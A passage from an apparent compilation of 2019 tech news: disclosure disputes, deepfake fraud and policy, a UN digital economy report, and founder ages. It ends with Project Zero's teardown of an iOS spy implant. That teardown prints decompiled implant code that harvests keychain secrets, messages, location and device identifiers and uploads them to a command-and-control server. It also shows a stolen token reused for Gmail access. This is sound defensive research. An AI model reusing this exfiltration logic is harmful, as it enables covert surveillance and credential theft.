To the US press, Boeing stated that the vulnerabilities discovered by Santamarta did exist but were not exploitable. However, the company did not provide any evidence for this.

According to Daniel Romero and Mario Rivas of the cyber security firm NCC Group, communication with various printer manufacturers was also problematic. Using automated penetration tests, the hackers had taken on the firmware of Brother, HP, Kyocera, Lexmark, Ricoh and Xerox printers and found 50 bugs, some of them serious, within a short time.

Communication as part of the responsible disclosure process was for the most part sluggish: some manufacturers responded to the researchers’ contact only after months. Half a year later, Kyocera and Ricoh still have not released security updates.

For 2020, Will Roper of the Air Force has even bigger plans than what he implemented at DEF CON 27: during the next conference, he wants to bring selected hackers to an air force base near Las Vegas and let them loose on all the digital systems of a real fighter jet. Alternatively, the control system of military satellites is also to be on offer.

“I would rather hackers find the bugs beforehand than have us bring the systems into a combat situation,” says Roper. In doing so, he demonstrates an attitude toward white-hat hackers that could save organizations and companies a lot of time and risk in the future with respect to as yet undiscovered bugs, and one that seems to be slowly but steadily gaining ground.

Thieves Used Audio Deepfake of a CEO to Steal $243,000

The heist is just a preview of how unprepared we are for AI-powered cybercrime.

In what may be the world’s first AI-powered heist, synthetic audio was used to imitate a chief executive’s voice and trick his subordinate into transferring over $240,000 into a secret account, The Wall Street Journal reported last week.

The company’s insurer, Euler Hermes, provided new details to the Washington Post on Wednesday but refused to name the company involved. The company’s managing director was called late one afternoon and his superior’s voice demanded the subordinate wire money to a Hungarian account to save on “late-payment fines”, sending the financial details over email while on the phone. A spokeswoman from Euler Hermes said, “The software was able to imitate the voice, and not only the voice: the tonality, the punctuation, the German accent.”

The thieves behind the voice would call back to demand a second payment, which raised the managing director’s suspicions and led to him calling his boss directly. In an email to Euler Hermes, the director said that the synthetic “‘Johannes’ was demanding to speak to me whilst I was still on the phone to the real Johannes!”

Over the past few years, deepfakes have been growing increasingly sophisticated. Online platforms fail to detect them, and companies struggle with how to handle the resulting fallout. The constant evolution of deepfakes means that simply detecting them will never be enough, given the nature of the modern internet, which guarantees them an audience by monetizing attention and fostering the production of viral content. This past June, convincing deepfakes of Mark Zuckerberg were published to Instagram and kept up shortly after Facebook refused to delete a manipulated video of Nancy Pelosi. There is still no clear consensus on how Facebook should’ve handled that situation or future ones.

All of this is exacerbated by the data monetization models of companies like Facebook and Google. Techno-sociologist Zeynep Tufekci warns that companies like Facebook rely on creating a “persuasion architecture” that “make[s] us more pliable for ads [while] also organizing our political, personal and social information flows.” That core dynamic, combined with the constant evolution of deepfake technology, means this problem will likely get worse across all online platforms unless the companies behind them can be convinced to change their business models.


A Site Faking Jordan Peterson’s Voice Shuts Down After Peterson Decries Deepfakes

The maker of a Jordan Peterson voice simulator that used AI to match his voice to any text input took the website down after the real Peterson freaked out.

by Samantha Cole

The owner of a website for generating convincing clips of Jordan Peterson saying whatever you want using AI shut down their creation this week after the real Peterson announced his displeasure and raised the possibility of legal action.

While the site was up, a 21-second recording greeted visitors to the site, saying in Peterson’s voice, “This is not Jordan Peterson. In fact, I’m a neural network designed to sound like Dr. Peterson.”

The clip implored the visitor to type some text into a box; the text would be fed into a neural network trained on hours of Peterson’s actual voice and turned into audio that sounded a lot like the real thing.

“The Deep Fake artists need to be stopped, using whatever legal means are necessary, as soon as possible.”

Several media outlets tested the program and published the results, making him pantomime feminist texts and vulgarities. Aside from the outrageous content, the results sounded a lot like the real thing.

It turns out that Peterson—a controversial Canadian professor known for his lectures defending the patriarchy and denying the existence of white privilege while decrying “postmodern neo-Marxists”—did not find it flattering.

“Something very strange and disturbing happened to me this week,” Peterson wrote on his website. “If it was just relevant to me, it wouldn’t be that important (except perhaps to me), and I wouldn’t be writing this column about it. But it’s something that is likely more important and more ominous than we can even imagine.”

He then goes on to spend over 1,300 words decrying deepfakes—algorithmically-generated face-swapped videos, not fake audio but sometimes combined with fake voices—as a threat to politics, personal privacy, and veracity of evidence, and ends with a vague allusion toward making fake audio and video illegal. Or, possibly, suing creators.

“Wake up. The sanctity of your voice, and your image, is at serious risk,” he wrote. “It’s hard to imagine a more serious challenge to the sense of shared, reliable reality that keeps us linked together in relative peace. The Deep Fake artists need to be stopped, using whatever legal means are necessary, as soon as possible.”

After Peterson published this blog post, the NotJordanPeterson website shut down operations. “In light of Dr. Peterson’s response to the technology demonstrated by this site … and out of respect for Dr. Peterson, the functionality of the site will be disabled for the time being,” the site owner wrote.

The site owner told Motherboard that despite Peterson’s hinting at legal action in his blog, Peterson isn’t suing him, and he took NotJordanPeterson down after he saw his negative reaction. At the time of publication, Peterson has not responded to Motherboard’s request for comment.

It’s interesting to see a public figure like Peterson address deepfakes so directly. Plenty of other celebrities have been subject to the algorithmic face-swap and fake-audio treatment, including podcast host Joe Rogan, Nicolas Cage, and Elon Musk.

The AI models that generate fake video or audio rely on a huge amount of existing data to analyze and “learn” from. As it happens, refusing to shut the fuck up—as so many powerful men are wont to—produces great training material for building a realistic AI model of someone.

Before Peterson, the closest any powerful men have come to commenting on deepfakes as a phenomenon is Mark Zuckerberg, after an artist created a deepfake of him saying some insidious things. The media coverage of that satirical art project forced his platform to enact policies around handling fake video content.

But what Peterson is implying in this screed—that deepfakes, even as art, should be stopped, banned, and otherwise made illegal—is something legislators and AI ethicists have grappled with since the dawn of deepfakes two years ago. Many experts say that regulating deepfakes is a bad idea, because trying to do so could chill First Amendment rights and free speech online.

Peterson mentions Rep. Yvette Clarke’s proposed DEEPFAKES Accountability Act as a potential solution to his embarrassment, and to what he sees as the dangers of deepfakes as a whole. The Electronic Frontier Foundation notes that in that bill, “while there is an exception for parodies, satires, and entertainment—so long as a reasonable person would not mistake the ‘falsified material activity’ as authentic—the bill fails to specify who has the burden of proof, which could lead to a chilling effect for creators.”

As a big fan of free speech, Peterson of all people should be wary of suggesting we sue the pants off anyone who makes an unflattering mimicry of us online. If he really wants to do something to combat the real dangers of deepfakes, he could start with advocating for improving the legislation that does exist to get help for victims of revenge porn and non-consensual nudes. Those are the people who are really impacted by harassment and intimidation online.


There Is No Tech Solution to Deepfakes

Funding technological solutions to algorithmically-generated fake videos only puts a bandage on the deeper issues of consent and media literacy.

Every day, Google Alerts sends me an email rounding up all the recent articles that mention the keyword “deepfake.” The stories oscillate between suggesting deepfakes could trigger war and covering Hollywood’s latest quirky use of face-swapping technology. It’s a media whiplash that fits right in with the rest of 2018, but this coverage frequently misses what we should actually fear most: A culture where people are fooled en masse into believing something that isn’t real, reinforced by a video of something that never happened.

In the nine months since Motherboard found a guy going by the username “deepfakes” posting face-swapped, algorithmically-generated porn on Reddit, the rest of the world rushed straight for the literal nuclear option: if nerds on the internet can create fake videos of Gal Gadot having sex, then they can also create fake videos of Barack Obama, Donald Trump, and Kim Jong Un that will somehow start an international incident that leads to nuclear war. The political implications of fake videos are so potentially dangerous that the US government is funding research to automatically detect them.

In April, the US Defense Advanced Research Projects Agency (DARPA)’s Media Forensics department awarded nonprofit research group SRI International three contracts to find ways to automatically detect digital video manipulations. Researchers at the University at Albany received funding from DARPA to study deepfakes, and found that analyzing the blinks in videos could be one way to detect a deepfake from an unaltered video.

The worry that deepfakes could one day cause a nuclear war is a tantalizing worst-case scenario, but it skips right past current and pressing issues of consent, media literacy, bodily autonomy, and ownership of one’s own digital self. Those issues are not far-fetched or theoretical. They are exacerbated by deepfakes today. Will someone make a fake video of President Donald Trump declaring war against North Korea and get us all killed? Maybe. But the end of humanity is the most extreme end result, and it’s getting more attention than issues around respecting women’s bodies or assessing why the people creating deepfakes felt entitled to use their images without permission to begin with.

Until we grapple with these deeply entrenched societal issues, DARPA’s technical solutions are bandages at best, and there’s no guarantee that they will work anyway.

To make a believable deepfake, you need a dataset composed of hundreds or thousands of photos of the face of the person you’re trying to overlay onto the video. The solution proposed by researchers at the University at Albany assumes that these photos, or “training datasets,” probably don’t include enough images of the person blinking. The end result is a fake video that might look convincing, but in which people don’t blink naturally.

But even those researchers concede that this isn’t a totally reliable way to detect deepfakes. Siwei Lyu, a professor at the State University of New York at Albany, told MIT Technology Review that a quality deepfake could get around the eye-blinking detection tool by collecting images in the training dataset that show the person blinking.

Lyu told MIT Tech Review that his team has an even better technique for detecting deepfakes than blinks, but declined to say what it is. “I’d rather hold off at least for a little bit,” Lyu says. “We have a little advantage over the forgers right now, and we want to keep that advantage.”

This exemplifies the broader problem with trying to find a technical solution to the deepfakes problem: as soon as someone figures out a way to automatically detect a deepfake, someone will find a way around it. Platforms are finding out that combating fake porn showing up on their sites is not as easy as blocking a keyword or banning a forum. Image host Gfycat, for example, thought it could use automated tools to detect algorithmically-generated videos on its platform and kick them off, but months after it announced this effort, we still found plenty of deepfakes hosted there.

The algorithms themselves will, by design, stay locked in a cat-and-mouse game of outdoing each other. When one solution for detection pops up—like the blinks—the other will learn from it, and match it. We’ve seen this happen with bots that are continually getting better at solving CAPTCHAs, forcing bot-detection systems to make the CAPTCHAs more difficult to solve, which the bots learn to beat, and so on, infinitely.

This doesn’t mean that we should throw our hands up and stop trying to find tech solutions to complex problems like deepfakes. It means that we need to recognize the limitations of these solutions, and to continue to educate people about technology and media, when to trust what they see, and when to be skeptical.

Florida senator Marco Rubio got it right when he talked about deepfakes at a Heritage Foundation forum last month: “I think the likely outcome would be that [news outlets] run the video, with a quotation at the end saying, by the way, we contacted senator so-and-so and they denied that that was them,” he said, talking about a hypothetical scenario where a deepfake video could spread as a news tip to journalists. “But the vast majority of the people watching that image on television are going to believe it.”

Fake news isn’t new, and malicious AI isn’t new, but the combination of the two, plus a widespread destabilized trust in media is only going to erode our sense of reality even more.

This isn’t paranoia. We saw a small glimpse of this with the spoof video that Conservative Review network CRTV made of Alexandria Ocasio-Cortez about a month after she won the Democratic congressional nomination in New York. CRTV cut together a video of Ocasio-Cortez giving an interview to make it seem like she bombed it. This wasn’t a deepfake by any means—it was rudimentary video editing. Still, more than one million people viewed it and some people fell for it. If you already thought poorly of Ocasio-Cortez, the video could reinforce your beliefs.

If people are gullible enough to believe in conspiracy theories—so much so that they show up at Trump rallies with signs and shirts supporting QAnon—we don’t need AI to fool anyone into believing anything.

The first headline we published for a deepfakes story, back in December, said: “AI-Assisted Fake Porn Is Here and We’re All Fucked.” We stand by that. We are still deeply fucked. Not because a deepfake is going to lead to nuclear war, but because we have so many problems we need to solve before we worry about advanced detection of AI-generated video.

We need to figure out how platforms will moderate users spreading malicious uses of AI, and revenge porn in general. We have to solve the problems around consent, and the connection between our bodily selves and our online selves. We need to face the fact that debunking a video as fake, even if it’s proven by DARPA, won’t change someone’s mind if they’re seeing what they already believe. If you want to see a video of Obama saying racist things into a camera, that’s what you’ll see—regardless of whether he blinks.

The Department of Defense can’t save us. Technology won’t save us. Being more critically-thinking humans might save us, but that’s a system that’s a lot harder to debug than an AI algorithm.


This Program Makes It Even Easier to Make Deepfakes

Unlike previous deepfake methods, FSGAN can generate face swaps in real time, with zero training.

A new method for making deepfakes creates realistic face-swapped videos in real-time, no lengthy training needed.

Unlike previous approaches to making deepfakes—algorithmically-generated videos that make it seem like someone is doing or saying something they didn’t in real life—this method works on any two people without any specific training on their faces.

Most of the deepfakes that are shared online are created by feeding an algorithm hundreds or thousands of images of a specific face. The algorithm “trains” on that specific face so it can swap it into the target video. This can take hours or days even with access to expensive hardware, and even longer with consumer-grade PC components. A program that doesn’t need to be trained on each new target is another leap forward in making realistic deepfakes quicker and easier to create.

“Our method can work on any pair of people without specific training,” the researchers said in a video presenting their method. “Therefore, we can produce real-time results on unseen subjects.”

Researchers from Bar-Ilan University in Israel and the Open University of Israel posted their paper, “FSGAN: Subject Agnostic Face Swapping and Reenactment,” to the arXiv preprint server on Friday. On their project page, the researchers write that the open-source code is impending; in the paper, they say that they’re publishing the details of this program because to suppress it “would not stop their development,” but rather leave the public and policymakers in the dark about the potential misuse of these algorithms.

In a video demonstrating the FSGAN program, the researchers show how it can overcome hair and skin tone to swap faces seamlessly:


Similar to how the single-shot method developed by Samsung AI used landmarks on the source and target’s faces to map the Mona Lisa’s face to make her “speak,” FSGAN pinpoints facial landmarks, then aligns the source face to the target’s face.

The FSGAN program itself wasn’t cheap or easy to make: The researchers say in their paper that it required eight Nvidia Tesla V100 GPUs—which can cost around $10,000 each for consumers—to train the generative adversarial network that the program then uses to create deepfakes in real time.

On their project website, the researchers say that the project code will eventually be available on GitHub, a platform for open-source code development. Assuming the researchers make a pre-trained AI model available, it’s likely that using it at home won’t be as resource-intensive as it was to train it from scratch in a lab.

“Our method eliminates laborious, subject specific data collection and model training, making face swapping and reenactment accessible to non-experts,” the researchers wrote. “We feel strongly that it is of paramount importance to publish such technologies, in order to drive the development of technical counter-measures for detecting such forgeries, as well as compel lawmakers to set clear policies for addressing their implications.”

UN report: 7 platforms dominate the world market

GAFA, Microsoft, Tencent, Alibaba.

According to the UN’s first-ever “Digital Economy Report 2019”, seven platforms from the US and China dominate the global market, among them Microsoft, Amazon and Alibaba.

The global digital economy is dominated by seven internet and tech corporations from the US and China and their platforms. That is the finding of the first-ever “Digital Economy Report 2019”, which the UN presented on Wednesday. The UN speaks of so-called “super platforms”, which are said to account for two thirds of the global market, as reported. According to the UN study, these platforms are Microsoft, Apple, Amazon, Google and Facebook, as well as Tencent and Alibaba.

China and US: 90 percent market share of the digital economy

The gap between US and Chinese corporations and the rest of the world becomes even larger when all internet platforms are included in the calculation. Then, according to the UN, the large corporations from the US and China reach a global market share of 90 percent. European companies reach just four percent. The remaining six percent are spread across all other countries of the world. Against this background, the UN called for global efforts to change this situation.

According to UN Secretary-General Antonio Guterres, this also includes the fact that more than half of the world has no or only limited access to the internet. Work must be done to “close this digital divide”. Interestingly, it is precisely the large US platforms and Chinese corporations that are currently working to bring the internet to rural and remote areas. While the US tech giants Facebook, Amazon and Google want to achieve this with the help of balloons, drones or satellites, China is relying on the “Digital Silk Road” infrastructure project.

Drei viertel aller Blockchain-Patente stammen aus China oder den USA

Neben dem 90-prozentigen Marktanteil bei den großen digitalen Konzernen sieht die Uno-Studie auch in weiteren Bereichen eine Dominanz von China und den USA. So verantworten die beiden Länder 75 Prozent aller Blockchain-Patente sowie mehr als 75 Prozent des weltweiten Cloud-Marktes. Zudem stammen rund die Hälfte der weltweiten Ausgaben für das Internet der Dinge aus China und den USA, wie Xinhua schreibt.





UN Digital Economy Report 2019

Value Creation and Capture: Implications for Developing Countries


The rapid spread of digital technologies is transforming many economic and social activities. While creating many new opportunities, widening digital divides threaten to leave developing countries, and especially least developed countries, further behind. A smart embrace of new technologies, enhanced partnerships and greater intellectual leadership are needed to redefine digital development strategies and the future contours of globalization.

This first edition of the Digital Economy Report – previously known as the Information Economy Report − examines the scope for value creation and capture in the digital economy by developing countries. It gives special attention to opportunities for these countries to take advantage of the data-driven economy as producers and innovators – but also to the constraints they face – notably with regard to digital data and digital platforms.

Digital advances have already led to the creation of enormous wealth in record time, but this is highly concentrated in a small number of countries, companies and individuals. Meanwhile, digitalization has also given rise to fundamental challenges for policymakers in countries at all levels of development. The Report presents recent trends and discusses key policies for value creation and capture in the digital economy, notably with regards to entrepreneurship, data, trade, competition, taxation, intellectual property and employment.

These are early days in the digital era and there are still more questions than answers about how to deal with the digital challenge. Given the absence of relevant statistics and empirical evidence, as well as the rapid pace of technological change, decision-makers face a moving target when trying to adopt sound policies relating to the digital economy. The Report provides valuable insights and analyses to support policymakers at the national and international levels to ensure that no one is left behind by the fast-evolving digital economy.




CCTV: the most surveilled cities in Europe

by  on 05.09.2019

According to a survey by Comparitech, Berlin is monitored by almost 40,000 cameras, which is about 11.2 cameras per 1,000 inhabitants. That puts the federal capital in second place in the ranking of Europe's most surveilled cities; worldwide, Germany's largest city is in 19th place. Compared with London, however, Berlin still has plenty of room to grow when it comes to surveillance of public space. On the Thames, around 630,000 cameras keep track of what the 9.6 million inhabitants are up to, which is 68.4 cameras per 1,000 inhabitants.

Incidentally, the most surveilled cities in the world are all in China. In first place is Chongqing, located at the confluence of the Yangtze and Jialing rivers, with 168 cameras per 1,000 inhabitants.





The 10 most innovative economies in the world

by  on 05.09.2019

Cancer research, meat substitutes and smart-home technologies are among the major developments of our time. But which countries lead the world in research and development? A current Bloomberg ranking shows the most innovative countries by index value. In it, Germany is in second place.

The ranking took into account factors such as research and development spending, the number of domestic patent applications and the number of domestic publicly listed high-tech companies. As in the previous year, South Korea took first place, with an index value of 87.38 out of a possible 100 points, as the Statista chart shows. Germany is only just behind with a value of 87.30. Switzerland is also in the top 5, taking fourth place among the most innovative economies this year.





Youth Myth: Founders of Successful Tech Companies Are Mostly Middle-Aged

Aug. 29, 2019

It took an entrepreneur to reimagine the mundane home thermostat as an object of beauty — and then to make a fortune based on that vision.

The entrepreneur was Tony Fadell, who had that thermostat epiphany after decades in the tech industry, including at companies like Apple. Mr. Fadell embodied his idea in a new company, Nest, which he started with the help of a colleague from Apple in 2010, at age 41.

The Nest thermostat had a sleek and intuitive design, smartphone connectivity and the ability to learn its owner’s temperature-setting habits. The product was a big hit, and within a few years Google acquired Nest for $3.2 billion.

Mr. Fadell’s deep experience and relatively mature age when he started Nest are typical of superstar entrepreneurs, who are rarely fresh out of college — or freshly dropped out of college. That’s what a team of economists discovered when they analyzed high-growth companies in the United States. Their study is being published in the journal American Economic Review: Insights.

The researchers looked at start-ups established between 2007 and 2014 and analyzed the top 0.1 percent — defined as those with the fastest growth in employment and sales. The average age of those companies’ founders was 45.

There are, of course, famous counterexamples. Mark Zuckerberg was 19 when he co-founded Facebook. Bill Gates was 19 when he founded Microsoft with Paul Allen. Steve Jobs was 21 when he founded Apple with Steve Wozniak. The origin stories of those companies and a handful of others helped to shape a myth that tech, and American innovation overall, is fueled by wunderkinds. But fresh-faced founders are the exception, not the rule, according to the study.

The research, by the economists Pierre Azoulay of M.I.T., Ben Jones of Northwestern, J. Daniel Kim of the University of Pennsylvania and Javier Miranda of the United States Census Bureau, provides the first systematic calculation of the ages of the founders of high-growth start-ups in the United States.

Previous studies had documented that owners of small businesses tended to be in their late 30s and 40s. But most small businesses stay fairly small: restaurants, dry cleaners, retail stores and the like. They are important but aren’t central to innovation in the economy.

The new study was able to zero in on high-flying start-ups by bringing together anonymized data collected by different agencies within the federal government. The government matched sales and employment data for start-ups collected by the Census Bureau with information on the founders extracted from Internal Revenue Service filings.

After stripping identifying information, the government provided the researchers with a data set including 2.7 million business founders. The researchers calculated that the founders’ average age was 42. And for the founders of the 0.1 percent fastest-growing firms, the average age was 45. Firms that were successful enough to have an initial public offering or be acquired by a larger company showed the same pattern: Their founders were generally middle-aged.

Steve Jobs in 1977. He was 21 when he co-founded Apple.

That isn’t to say that youth has no advantages.

Younger people often have a risk-taking mind-set and that might help them develop game-changing ideas. In addition, raw problem-solving ability — what psychologists call fluid intelligence — seems to peak early. It may already be declining by the time we’re in our 20s.

Still, the findings on age and entrepreneurship echo earlier myth-busting by researchers about scientific breakthroughs. While Albert Einstein did pathbreaking work on special relativity and the photoelectric effect at 26, such early discoveries aren’t typical. A study of Nobel laureates in physics over the 20th century found that those scientists did their prizewinning work at an average age of 37.

In applied science, crystallized intelligence, gained through experience, appears to be even more vital: Nobel-worthy breakthroughs in medicine arrived a bit later, at age 40, on average.

In short, entrepreneurial success isn’t just a function of raw intelligence and a propensity for risk-taking. It depends on a variety of ingredients, many of which appear to improve with age.

Consider Mr. Fadell’s story.

He started working in Silicon Valley in the early 1990s, designing products at General Magic and Philips Electronics. In the 2000s he moved to Apple, where he led the engineering team that created the iPod digital music player, and played a crucial role in the development of the early iPhone. In 2010, after amassing all that experience, he founded Nest with Matt Rogers, a young Apple engineer.

In an interview, Mr. Fadell recounted how, after he left Apple, he and his family traveled the world and designed an eco-friendly home for themselves in Lake Tahoe. He said he was dissatisfied with the clunky thermostats offered by his contractor or visible during his travels.

“Thermostats were ugly, outdated, and didn’t help you save money or keep you comfortable,” Mr. Fadell said. He recalls thinking: “There’s something fundamentally wrong here and there’s no product in the market to address it.” So he created a new thermostat and a new company.

Mr. Fadell said he had tried to start successful companies in college and earlier in his career but they failed because he wasn’t ready.

“There were a lot of things I needed to learn to finally be able to nail it,” he said. He learned about product design at General Magic, he said, and about managing teams and financing at Philips Electronics. At Apple, he said, Mr. Jobs showed him how to go beyond designing a product; the key, Mr. Fadell said, was to design the customer’s whole experience, from packaging to messaging.

When he needed to recruit a team for Nest, he said, he was already a Silicon Valley veteran. “I’d been in the Valley for 20 years so I had a huge network of people I’d worked with before,” he said.

His thinking, as an older man, was different, too. In his 20s, he said, he was barely aware of thermostats. “College students know what college students need,” he said. “When you get older, you start to need and understand other things.”

A lot of innovation in business benefits from experience. Youth has its triumphs, but some roads to success are lengthy. They require age and staying power.





Google Project Zero: iPhones could be hacked for years

To infect an iPhone, it was enough to visit a manipulated website.

Unnoticed while browsing

Google's security researchers find that iPhones could be hacked and spied on via manipulated websites for years. The attackers had practically full control over the devices and could harvest files, photos, chats or credentials at will.

At the beginning of the year, Google's Project Zero found several manipulated websites through which it was possible to infect iPhones with malware. Via so-called implants, the attackers were not only able to copy data or photos and retrieve the location. They had full access to all areas of the devices and could even read messages from end-to-end encrypted messengers such as iMessage, WhatsApp or Telegram out of the code. Email apps were also open books to the attackers, and they could even steal stored credentials and login tokens from the iCloud keychain.

Complicated and expensive

In total, the security researchers identified 14 vulnerabilities which the hackers exploited for five attack chains. Since the so-called exploits are quite complicated and are traded at very high prices for iPhones on the black market, the Project Zero team suspects they may have served intelligence services to spy on specific population groups. It was enough to visit the manipulated websites; no further action on the part of the victims was needed to place the implant.

The researchers assume the campaign ran for at least two years and that Apple's operating system was vulnerable from iOS 10 up to iOS 12. Google informed Apple on 1 February with a seven-day deadline before the problem would have been made public. Apple then released the update to iOS 12.1.4 on 7 February to close the vulnerabilities. The researchers point out that at least one of the five attack chains was still unpatched on the day of discovery, i.e. it was a so-called zero-day exploit.

Danger not averted

Project lead Ian Beer writes that the attackers could still do great damage, since they are still in possession of the captured credentials and tokens. Moreover, one should be aware that there are very likely other similar hacking campaigns that have not yet been discovered. Protective measures are never sufficient once one has been declared a target, Beer writes. It could be enough simply to live in a certain region or belong to a certain ethnic group.

One should always keep this in mind and behave accordingly, Beer advises. If users integrate their smartphones into their lives and entrust everything to them, this information could under certain circumstances end up in a database and be used against them. In this specific case, users of a hijacked iPhone could get rid of the spies simply by restarting. It will not always be that easy.

Source: , kwe



Thursday, August 29, 2019

Implant Teardown

Posted by Ian Beer, Project Zero

In the earlier posts we examined how the attackers gained unsandboxed code execution as root on iPhones. At the end of each chain we saw the attackers calling posix_spawn, passing the path to their implant binary which they dropped in /tmp. This starts the implant running in the background as root. There is no visual indicator on the device that the implant is running. There’s no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system.

The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds.

Before diving into the code let’s take a look at some sample data from a test phone running the implant and communicating with a custom command and control server I developed. To be clear, I created this test specifically for the purposes of demonstrating what the implant enabled the attacker to do and the screenshots are from my device. The device here is an iPhone 8 running iOS 12.

The implant has access to all the database files (on the victim’s phone) used by popular end-to-end encryption apps like Whatsapp, Telegram and iMessage. We can see here screenshots of the apps on the left, and on the right the contents of the database files stolen by the implant, which contain the unencrypted plain text of the messages sent and received using the apps:





Here’s a conversation in Google Hangouts for iOS and the corresponding database file uploaded by the implant. With some basic SQL we can easily see the plain text of the messages, and even the URL of the images shared.

The implant can upload private files used by all apps on the device; here’s an example of the plaintext contents of emails sent via Gmail, which are uploaded to the attacker’s server:


The implant also takes copies of the user’s complete contacts database:

And takes copies of all their photos:

Real-time GPS tracking:
The implant can also upload the user’s location in real time, up to once per minute, if the device is online. Here’s a real sample of live location data collected by the implant when I took a trip to Amsterdam with the implant running on a phone in my pocket:

The implant uploads the device’s keychain, which contains a huge number of credentials and certificates used on and by the device. For example, the SSIDs and passwords for all saved wifi access points:



The v_Data field is the plain-text password, stored as base64:

$ echo YWJjZDEyMzQ= | base64 -D
abcd1234

The keychain also contains the long-lived tokens used by services such as Google’s iOS Single-Sign-On to enable Google apps to access the user’s account. These will be uploaded to the attackers and can then be used to maintain access to the user’s Google account, even once the implant is no longer running. Here’s an example using the Google OAuth token stored as in the keychain being used to log in to the Gmail web interface on a separate machine:


The implant is embedded in the privilege escalation Mach-O file in the __DATA:__file section.

From our analysis of the exploits, we know that the fake kernel task port (which gives kernel memory read and write) is always destroyed at the end of the kernel exploit. The implant runs completely in userspace, albeit unsandboxed and as root with entitlements chosen by the attacker to ensure they can still access all the private data they are interested in.

Using jtool we can view the entitlements the implant has. Remember, the attackers have complete control over these as they used the kernel exploit to add the hash of the implant binary’s code signature to the kernel trust cache.

$ jtool --ent implant
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

Many system services on iOS will try to check the entitlements of clients talking to them, and only allow clients with particular entitlements to perform certain actions. This is why, even though the implant is running as root and unsandboxed, it still requires a valid entitlements blob. They’re assigning themselves three relevant entitlements:

keychain-access-groups is used to restrict access to secrets stored in the keychain; they’ve given themselves a wildcard value here. enables the use of CoreLocation without explicit user consent, as long as Location Services is enabled. allows retrieval of the device’s phone number.


The binary is compiled without optimizations and written in Objective-C. The code snippets here are mostly manually decompiled with a bit of help from hex-rays.


The implant consists of two Objective-C classes: Service and Util and a variety of helper functions.

The implant starts by creating an instance of the Service class and calling the start selector before getting a handle to the current runloop and running it.

-[Service start] {
  [self startTimer];
  [self upload];
}

[Service startTimer] will ensure that the Service instance’s timerHandle method is invoked every 60 seconds:

// call timer_handle every 60 seconds
-[Service startTimer] {
  timer = [NSTimer scheduledTimerWithTimeInterval:60.0
  old_timer = self->_timer;
  self->_timer = timer;
  [old_timer release]

timer_handle is the main function responsible for handling the command and control communication. Before the device goes in to the timer_handle loop however it first does an initial upload:

-[Service upload] {
  [self uploadDevice];
  [self requestLocation];
  [self requestContacts];
  [self requestCallHistory];
  [self requestMessage];
  [self requestNotes];
  [self requestApps];
  [self requestKeychain];
  [self requestRecordings];
  [self requestSmsAttachments];
  [self requestSystemMail];
  if (!self->_defaultList) {
    self->_defaultList = [Util appPriorLists];
  }
  [self requestPriorAppData:self->_defaultList];
  [self requestPhotoData];
}

This performs an initial bulk upload of data from the device. Let’s take a look at how these are implemented:

-[Service uploadDevice] {
  info = [Util dictOfDeviceInfo];
  // retry every 10 seconds until the upload succeeds
  while( [self postFiles:info remove:1] == 0) {
    [NSThread sleepForTimeInterval:10.0];
    info = [Util dictOfDeviceInfo];
  }
}

Note the call to NSLog is really there in the production implant. If you connect the iPhone via a lightning cable to a Mac and open you can see these log messages as the implant runs.

Here’s [Util dictOfDeviceInfo]:

+[Util dictOfDeviceInfo] {
  struct utsname name = {};
  machine_str = [NSString stringWithCString:name.machine
   // CoreTelephony private API
  device_phone_number = CTSettingCopyMyPhoneNumber();
  if (!device_phone_number) {
    device_phone_number = @"";
  }
  net_str = @"Cellular";
  if ([self isWifi]) {
    net_str = @"Wifi";
  }
  dict = @{@"name":         [[UIDevice currentDevice] name],
           @"iccid":        [self ICCID],
           @"imei":         [self IMEI],
           @"SerialNumber": [self SerialNumber],
           @"PhoneNumber":  device_phone_number,
           @"version":      [[UIDevice currentDevice] systemVersion],
           @"totaldisk":    [NSNumber numberWithFloat:
                              [[self getTotalDiskSpace] stringValue]],
           @"freedisk":     [NSNumber numberWithFloat:
                              [[self getFreeDiskSpace] stringValue]],
           @"platform":     machine_str,
           @"net":          net_str};
  // serialize to a uniquely named plist under /tmp
  path = [@"/tmp" stringByAppendingPathComponent:[NSUUID UUIDString]];
  [dict writeToFile:path atomically:1];
  return @{@"device.plist": path};
}

Here’s the output which gets sent to the server when the implant is run on one of my test devices:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<string>Ian Beer’s iPhone</string>

This method collects a myriad of identifiers from the device:

  • the iPhone model
  • the iPhone name (“Ian’s iPhone”)
  • the ICCID of the SIM card, which uniquely identifies the SIM
  • the iPhone serial number
  • the current phone number
  • the iOS version
  • total and free disk space
  • the currently active network interface (wifi or cellular)

They build an Objective-C dictionary object containing all this information then use the NSUUID class to generate a pseudo-random, unique string. They use that string to create a new file under /tmp, for example /tmp/68753A44-4D6F-1226-9C60-0050E4C00067. They serialize the dictionary object as XML to that file and return a dictionary @{@"device.plist": path} mapping the name "device.plist" to that path in /tmp. This rather odd design pattern of serializing everything to files in /tmp is used throughout the implant.

Let’s take a look at how that file will get off the device and up to the attacker’s server.

[Service uploadDevice] passes the returned @{@"device.plist": path} dictionary to [Service postFiles]:

  [self postFiles:info remove:1]

-[Service postFiles:files remove:] {
  if([[files allKeys] count] == 0) {
  sem = dispatch_semaphore_create(0.0)
  base_url_str = [
    [@"http://X.X.X.X" stringByTrimmingCharactersInSet:
                         [NSCharacterSet whitespaceAndNewlineCharacterSet]]]
  full_url_str = [base_url_str stringByAppendingString:@"/upload/info"]
  url = [NSURL URLWithString:full_url_str]
  req = [NSMutableURLRequest requestWithURL:url]
  [req setHTTPMethod:@"POST"]
  [req setTimeoutInterval:120.0]
  // hardcoded multipart boundary
  content_type_str = [NSString stringWithFormat:
    @"multipart/form-data; charset=utf-8;boundary=%@", @"9ff7172192b7"];
  [req setValue:content_type_str forHTTPHeaderField:@"Content-Type"]
  // this is set in [Service init], it's SerialNumber
  // from [Util SerialNumber]
  params_dict = @{@"sn": self->_sn}
  body_data = [self buildBodyDataWithParams:params_dict AndFiles:files]
  session = [NSURLSession sharedSession]
  NSURLSessionUploadTask* task = [session uploadTaskWithRequest:req
             ^(NSData *data, NSURLResponse *response, NSError *error){
                if (error) {
                  NSLog(@"postFile %@ Error: %@", _, _)
                } else {
                  NSLog(@"postFile success %@");
                if (remove) {
                  // use NSFileManager to remove all the files
  [task resume];
